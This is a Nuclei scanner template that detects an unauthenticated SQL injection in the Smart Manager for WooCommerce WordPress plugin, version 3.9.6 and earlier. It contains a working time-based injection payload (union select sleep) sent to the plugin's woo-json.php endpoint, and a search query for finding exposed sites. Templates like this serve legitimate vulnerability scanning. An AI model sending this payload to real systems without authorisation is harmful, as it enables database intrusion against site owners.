nuclei-templates/http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml

id: wp-smart-manager-sqli

info:
  name: Smart Manager for WooCommerce & WPeC <= 3.9.6 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The Smart Manager For WooCommerce – Stock Management, Bulk Edit & more… WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
  remediation: Fixed in version 3.9.7
  reference:
    - https://wpscan.com/vulnerability/e060fbff-792f-4fb5-baa5-82d80240ec99
    - http://cinu.pl/research/wp-plugins/mail_0666ceeca20683907bf82514e8f93e0f.html
    - https://wordpress.org/plugins/smart-manager-for-wp-e-commerce/
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/smart-manager-for-wp-e-commerce/"
  tags: wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli

http:
  - raw:
      - |
        GET /wp-content/plugins/smart-manager-for-wp-e-commerce/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 15s
        POST /wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cmd=saveData&edited=%5B%7B%22id%22%3A%22+1%29+union+select+sleep%287%29%2C2%3B+--+%22%7D%5D

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 500'
          - 'contains(body_1, "Smart Manager for e-Commerce")'
          - 'contains(body_2, "rel=\"preconnect") || contains(body, "Error</title>")'
        condition: and

# digest: 4b0a00483046022100d48833d917b76837f53e578260bb9d0de3214e380835f7dcabd526d0f4256a000221008a9469351298a08125b9eac1101e26f43e0a4b50583f0fbf6df5adc46cf16cc9:922c64590222798bb761d5b6d8e72950